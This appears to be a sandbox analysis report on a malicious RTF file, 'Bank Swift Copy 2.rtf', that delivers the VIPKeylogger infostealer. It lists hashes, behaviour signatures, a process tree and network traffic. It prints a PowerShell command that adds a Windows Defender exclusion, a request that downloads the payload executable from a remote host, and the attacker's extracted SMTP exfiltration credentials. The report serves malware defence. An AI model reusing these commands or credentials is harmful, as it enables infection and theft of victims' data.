Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
121s -
max time network
122s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
14/11/2024, 06:58 UTC
General
-
Target
Bank Swift Copy 2.rtf
-
Size
910KB
-
MD5
71b37aac269badfe278550c567b76db4
-
SHA1
a7fb35d35eb23fe3b4358e3c843f5982a161534e
-
SHA256
b7d62d77cace855288bf6b463f8ad783316594f90dad78d97a7ea85be58b8bc3
-
SHA512
db5999667758c607c1322dcd2652b350098a03f6bcd81c884efa5005920771a909f644a62979e7b4fd85d569a7374f9b980345bda822e1aa493e4c428d1c2b67
-
SSDEEP
6144:VwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAYwAGX3vfwukn15uV:I9
Score
10/10
Malware Config
Extracted
Family
vipkeylogger
Credentials
Protocol: smtp- Host:
mail.jhxkgroup.online - Port:
587 - Username:
obilog@jhxkgroup.online - Password:
7213575aceACE@@ - Email To:
obi@jhxkgroup.online
Signatures
-
VIPKeylogger
VIPKeylogger is a keylogger and infostealer written in C# and it resembles SnakeKeylogger that was found in 2020.
-
Vipkeylogger family
-
Blocklisted process makes network request 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
-
Loads dropped DLL 2 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops file in System32 directory 1 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
-
Drops file in Windows directory 1 IoCs
-
Browser Information Discovery 1 TTPs
Enumerate browser information.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 5 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Office loads VBA resources, possible macro or embedded object present
-
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious use of SetWindowsHookEx 2 IoCs
-
Suspicious use of WriteProcessMemory 21 IoCs
-
outlook_office_path 1 IoCs
-
outlook_win_path 1 IoCs
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Bank Swift Copy 2.rtf"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\splwow64.exeC:\Windows\splwow64.exe 122882⤵
-
-
C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding1⤵
- Blocklisted process makes network request
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\obigfdsdf.exe"C:\Users\Admin\AppData\Roaming\obigfdsdf.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\obigfdsdf.exe"3⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Roaming\obigfdsdf.exe"C:\Users\Admin\AppData\Roaming\obigfdsdf.exe"3⤵
- Executes dropped EXE
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
-
-
Network
-
GEThttp://87.120.84.39/txt/xXdquUOrM1vD3An.exeRemote address:87.120.84.39:80RequestGET /txt/xXdquUOrM1vD3An.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Host: 87.120.84.39
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Server: nginx/1.26.2
Date: Thu, 14 Nov 2024 06:58:09 GMT
Content-Type: application/x-msdos-program
Content-Length: 801792
Connection: keep-alive
Last-Modified: Thu, 14 Nov 2024 00:41:13 GMT
ETag: "c3c00-626d4b518d8d3"
Accept-Ranges: bytes
-
DNScheckip.dyndns.orgRemote address:8.8.8.8:53Requestcheckip.dyndns.orgIN AResponsecheckip.dyndns.orgIN CNAMEcheckip.dyndns.comcheckip.dyndns.comIN A193.122.6.168checkip.dyndns.comIN A132.226.8.169checkip.dyndns.comIN A158.101.44.242checkip.dyndns.comIN A193.122.130.0checkip.dyndns.comIN A132.226.247.73 -
GEThttp://checkip.dyndns.org/Remote address:193.122.6.168:80RequestGET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 06:58:37 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 68f5cd0c0ab37a888ca99b03700c61b1
-
GEThttp://checkip.dyndns.org/Remote address:193.122.6.168:80RequestGET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
ResponseHTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 06:58:39 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 2a3797b8c568754d78f65538d5192f49
-
GEThttp://checkip.dyndns.org/Remote address:193.122.6.168:80RequestGET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
ResponseHTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 06:58:45 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: fd3a450b25c21dec130d0433ba65e312
-
GEThttp://checkip.dyndns.org/Remote address:193.122.6.168:80RequestGET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
ResponseHTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 06:58:48 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 1a18988a8d796ca66c6926e123f79695
-
GEThttp://checkip.dyndns.org/Remote address:193.122.6.168:80RequestGET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
ResponseHTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 06:58:50 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 0dad97838534f6545a33e876814e9ef5
-
GEThttp://checkip.dyndns.org/Remote address:193.122.6.168:80RequestGET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
ResponseHTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 06:58:53 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 570d7a3fe6e9dd95b217119370e84364
-
GEThttp://checkip.dyndns.org/Remote address:193.122.6.168:80RequestGET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
ResponseHTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 06:58:56 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: d24f2288495bbb15acb1c6707e857946
-
GEThttp://checkip.dyndns.org/Remote address:193.122.6.168:80RequestGET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
ResponseHTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 06:58:58 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 4ce62619b29757e8aedd87d9c3779001
-
GEThttp://checkip.dyndns.org/Remote address:193.122.6.168:80RequestGET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
ResponseHTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 06:59:01 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 631b1a6133b36efe8688e580cc62dd45
-
GEThttp://checkip.dyndns.org/Remote address:193.122.6.168:80RequestGET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
ResponseHTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 06:59:04 GMT
Content-Type: text/html
Content-Length: 106
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
X-Request-ID: 7ba252dd4695160b3d752b0e087d6912
-
DNSreallyfreegeoip.orgRemote address:8.8.8.8:53Requestreallyfreegeoip.orgIN AResponsereallyfreegeoip.orgIN A104.21.67.152reallyfreegeoip.orgIN A172.67.177.134
-
GEThttps://reallyfreegeoip.org/xml/181.215.176.83Remote address:104.21.67.152:443RequestGET /xml/181.215.176.83 HTTP/1.1
Host: reallyfreegeoip.org
Connection: Keep-Alive
ResponseHTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 06:58:42 GMT
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 54976
Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9fqZzVXr3Brcy6kj9L4O5iVjOyPqHi%2F7Y15EcIJ3JYFZLoqBn5%2Fi2Hs2Gk%2BXezBlAoDd03Ccw2IyWyXUa%2BoHKIWlTm4LPXThU%2Foezn%2BrrVfAOR485juIfjUgmBBVgQrN9RBBuBpa"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e251d58597c9515-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=53116&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2865&recv_bytes=374&delivery_rate=70680&cwnd=252&unsent_bytes=0&cid=d1f6887bbe490ef8&ts=155&x=0"
-
GEThttps://reallyfreegeoip.org/xml/181.215.176.83Remote address:104.21.67.152:443RequestGET /xml/181.215.176.83 HTTP/1.1
Host: reallyfreegeoip.org
ResponseHTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 06:58:45 GMT
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 54979
Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lUn3C36gQOrHiqfxSVNG4pS7X8VjD8thC4BB2x04VEG2uWuF8l14IYk%2Biq4XYkTrq3APtZFARLvfG%2BLy1ObtbpKgItktfZxT7lFjlvbsrI74CWrQ1uj937FWKIZDVpJRipuMRbW8"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e251d6969f79515-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=53116&sent=7&recv=8&lost=0&retrans=1&sent_bytes=5371&recv_bytes=475&delivery_rate=70680&cwnd=254&unsent_bytes=0&cid=d1f6887bbe490ef8&ts=2884&x=0"
-
GEThttps://reallyfreegeoip.org/xml/181.215.176.83Remote address:104.21.67.152:443RequestGET /xml/181.215.176.83 HTTP/1.1
Host: reallyfreegeoip.org
ResponseHTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 06:58:48 GMT
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 54982
Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=32I%2FbgkonIHeeV4gKqBLV%2FcP4n4SnvBLiLrjXTPJzL4z1FtRt3CZ2MnGkOVj2Zguceo%2Bi2nEEyj6hD2SeQ1%2BdvTPs0%2FbNl4pMwVJnrLEODk7H8XMek4hETMGMj3ZzP6hzIY%2BDkkY"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e251d7a7ad89515-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=53116&sent=9&recv=10&lost=0&retrans=2&sent_bytes=7845&recv_bytes=576&delivery_rate=70680&cwnd=256&unsent_bytes=0&cid=d1f6887bbe490ef8&ts=5613&x=0"
-
GEThttps://reallyfreegeoip.org/xml/181.215.176.83Remote address:104.21.67.152:443RequestGET /xml/181.215.176.83 HTTP/1.1
Host: reallyfreegeoip.org
ResponseHTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 06:58:50 GMT
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 54984
Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wJDk2rZF%2Bur2cp5APYbfsybkMOf48pfBjwlt37msqkYgohZ8mwxOctRs0BJcjYHlxvgukdEJoyAwXMM3OeAa6DQWnnkyPMYLKdS6jSEaWJcTqVRY5VJ5HOLXvOGMfmMSXhAR3Acz"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e251d8b8b069515-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=78513&sent=10&recv=12&lost=0&retrans=2&sent_bytes=9098&recv_bytes=677&delivery_rate=70680&cwnd=256&unsent_bytes=0&cid=d1f6887bbe490ef8&ts=8356&x=0"
-
GEThttps://reallyfreegeoip.org/xml/181.215.176.83Remote address:104.21.67.152:443RequestGET /xml/181.215.176.83 HTTP/1.1
Host: reallyfreegeoip.org
ResponseHTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 06:58:53 GMT
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 54987
Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AlyoL0ilp2jnSsGT9nWZHA%2F%2F0ilaOnCdjjY9Q93BFLtVc2rnreGqeLzd1JyYIRShVnjGGRRGdHvyFcAUU3RZHRKwLlHYG%2FtRqkmDram5Uem5S1R5HHoXDDRgOCylvkU0JUo5gBNr"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e251d9cbaa29515-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=101032&sent=11&recv=14&lost=0&retrans=2&sent_bytes=10335&recv_bytes=778&delivery_rate=70680&cwnd=256&unsent_bytes=0&cid=d1f6887bbe490ef8&ts=11089&x=0"
-
GEThttps://reallyfreegeoip.org/xml/181.215.176.83Remote address:104.21.67.152:443RequestGET /xml/181.215.176.83 HTTP/1.1
Host: reallyfreegeoip.org
ResponseHTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 06:58:56 GMT
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 54990
Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VxQtd3OZpNMuQtPurj4Hj5N5FGxEcBYkdiZi38m8isor6gv%2BLvrq%2FnSuC%2F9416YSGEgGyRCBya0SjgV5DFOeQy30QtkMGGrOYqjYCIqlbw%2BF12%2FVy%2BwE8K3AykJaFkwI3%2FAdCm1G"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e251dadca889515-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=130184&sent=12&recv=16&lost=0&retrans=2&sent_bytes=11588&recv_bytes=879&delivery_rate=70680&cwnd=256&unsent_bytes=0&cid=d1f6887bbe490ef8&ts=13836&x=0"
-
GEThttps://reallyfreegeoip.org/xml/181.215.176.83Remote address:104.21.67.152:443RequestGET /xml/181.215.176.83 HTTP/1.1
Host: reallyfreegeoip.org
ResponseHTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 06:58:59 GMT
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 54993
Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rBEPG%2B7Zb0RRne9xaJYszBHxnet4msDxo0UsciyJIX%2FdxMo%2Fh0pX45insuGe6uAp%2FX36aN3byv6T%2Bis5Y7ZtQ1cleW5a4qO%2FJebslygeCoEc6YXa0PiIK2qEC7yCyZF%2FGlBw0q0X"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e251dbef9509515-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=130184&sent=14&recv=18&lost=0&retrans=3&sent_bytes=14094&recv_bytes=980&delivery_rate=70680&cwnd=256&unsent_bytes=0&cid=d1f6887bbe490ef8&ts=16588&x=0"
-
GEThttps://reallyfreegeoip.org/xml/181.215.176.83Remote address:104.21.67.152:443RequestGET /xml/181.215.176.83 HTTP/1.1
Host: reallyfreegeoip.org
ResponseHTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 06:59:01 GMT
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 54995
Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sscP5t6dZOf%2Btn78ZIQLhDJFOByTqYrFiujylYBt5ixTa5AE43YoQ%2F8qg3kcUGDqTUgPfyVl239J9uyHrHcrFk3NuYeOA6FPYOn9gV9ZOH1%2BHzbbZSxm%2BvoscSXrBbSapC47jzfh"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e251dd029469515-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=146976&sent=15&recv=20&lost=0&retrans=3&sent_bytes=15347&recv_bytes=1081&delivery_rate=70680&cwnd=256&unsent_bytes=0&cid=d1f6887bbe490ef8&ts=19320&x=0"
-
GEThttps://reallyfreegeoip.org/xml/181.215.176.83Remote address:104.21.67.152:443RequestGET /xml/181.215.176.83 HTTP/1.1
Host: reallyfreegeoip.org
ResponseHTTP/1.1 200 OK
Date: Thu, 14 Nov 2024 06:59:04 GMT
Content-Type: text/xml
Content-Length: 356
Connection: keep-alive
Cache-Control: max-age=31536000
CF-Cache-Status: HIT
Age: 54998
Last-Modified: Wed, 13 Nov 2024 15:42:26 GMT
Accept-Ranges: bytes
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dsEvoT1V8oBl69jyoPhxEq9Sr1QkJnigo4bLSK6uXnPQSE%2Blezd9d0FvrdozitNgDvw4NqctL6FeOBlYClFAegipHkFlUzUKgfw4TFXls3fKZpWX70fqml9y%2Fe8DaQYbW%2F1PCM7z"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8e251de128689515-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=161278&sent=16&recv=22&lost=0&retrans=3&sent_bytes=16600&recv_bytes=1182&delivery_rate=70680&cwnd=256&unsent_bytes=0&cid=d1f6887bbe490ef8&ts=22042&x=0"
-
DNSapi.telegram.orgRemote address:8.8.8.8:53Requestapi.telegram.orgIN AResponseapi.telegram.orgIN A149.154.167.220
-
87.120.84.39:80http://87.120.84.39/txt/xXdquUOrM1vD3An.exehttp
HTTP Request
GET http://87.120.84.39/txt/xXdquUOrM1vD3An.exeHTTP Response
200 -
193.122.6.168:80http://checkip.dyndns.org/http
HTTP Request
GET http://checkip.dyndns.org/HTTP Response
200HTTP Request
GET http://checkip.dyndns.org/HTTP Response
200HTTP Request
GET http://checkip.dyndns.org/HTTP Response
200HTTP Request
GET http://checkip.dyndns.org/HTTP Response
200HTTP Request
GET http://checkip.dyndns.org/HTTP Response
200HTTP Request
GET http://checkip.dyndns.org/HTTP Response
200HTTP Request
GET http://checkip.dyndns.org/HTTP Response
200HTTP Request
GET http://checkip.dyndns.org/HTTP Response
200HTTP Request
GET http://checkip.dyndns.org/HTTP Response
200HTTP Request
GET http://checkip.dyndns.org/HTTP Response
200 -
104.21.67.152:443https://reallyfreegeoip.org/xml/181.215.176.83tls, http
HTTP Request
GET https://reallyfreegeoip.org/xml/181.215.176.83HTTP Response
200HTTP Request
GET https://reallyfreegeoip.org/xml/181.215.176.83HTTP Response
200HTTP Request
GET https://reallyfreegeoip.org/xml/181.215.176.83HTTP Response
200HTTP Request
GET https://reallyfreegeoip.org/xml/181.215.176.83HTTP Response
200HTTP Request
GET https://reallyfreegeoip.org/xml/181.215.176.83HTTP Response
200HTTP Request
GET https://reallyfreegeoip.org/xml/181.215.176.83HTTP Response
200HTTP Request
GET https://reallyfreegeoip.org/xml/181.215.176.83HTTP Response
200HTTP Request
GET https://reallyfreegeoip.org/xml/181.215.176.83HTTP Response
200HTTP Request
GET https://reallyfreegeoip.org/xml/181.215.176.83HTTP Response
200 -
149.154.167.220:443api.telegram.orgtls
-
8.8.8.8:53checkip.dyndns.orgdns
DNS Request
checkip.dyndns.org
DNS Response
193.122.6.168132.226.8.169158.101.44.242193.122.130.0132.226.247.73
-
8.8.8.8:53reallyfreegeoip.orgdns
DNS Request
reallyfreegeoip.org
DNS Response
104.21.67.152172.67.177.134
-
8.8.8.8:53api.telegram.orgdns
DNS Request
api.telegram.org
DNS Response
149.154.167.220
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Exploitation for Client Execution
1Credential Access
Credentials from Password Stores
1Credentials from Web Browsers
1Unsecured Credentials
2Credentials In Files
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
783KB
MD54f80565082ea4d95d933decf9cd50c61
SHA12830f9d5f41bbecd2ae105ed0b9a8d49327c8594
SHA256d854f347061d9d7b8a9788ab8633c3f07619e29bd440924507a0147484c217c3
SHA5129dcdae5c7a5b4181ade738884e208508bf317742ca2be0726716aa71236670a50dae2bec947b3fcc12cfc85c756810f18a9f403de4eb428b4a73a4759037f227
-
Filesize
4KB
-
Filesize
288KB
-
Filesize
288KB
-
Filesize
288KB
-
Filesize
288KB
-
Filesize
288KB
-
Filesize
288KB
-
Filesize
288KB
-
Filesize
44KB
-
Filesize
4KB
-
Filesize
44KB
-
Filesize
64KB
-
Filesize
568KB
-
Filesize
72KB
-
Filesize
808KB